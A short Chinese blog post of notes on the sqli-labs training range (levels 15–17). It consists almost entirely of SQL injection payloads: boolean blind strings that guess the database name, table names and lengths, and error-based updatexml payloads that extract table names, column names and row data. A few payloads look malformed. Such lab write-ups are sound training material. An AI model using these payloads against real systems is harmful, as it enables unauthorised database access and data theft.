【靶场训练】sql-libs
作者:互联网
less-15
布尔盲注
' or (length(database())=8)-- lq 判断数据库长度
'or (substr(database(),1,1)='s' -- lq) 猜库名
'or (substr(select table_name from information_schema.tables where table_schema='security' limit 0,1,1,1)='s' -- lq) 猜表名
.......
less-16
布尔盲注闭合方式为("")
less-17
报错注入攻击
账号输入admin。
' and updatexml(1,concat('~',(select database()),'~'),1) -- lq 库名
' and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~'),1) -- lq 判断表名
' and updatexml(1,concat('~',(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),'~'),1) -- lq 判断字段名
' and updatexml(1,concat('~',(select id from security.emails limit 0,1),'~'),1) -- lq 表中数据
标签:--,sql,lq,libs,table,靶场,updatexml,select,schema 来源: https://www.cnblogs.com/scjinjiang/p/16355315.html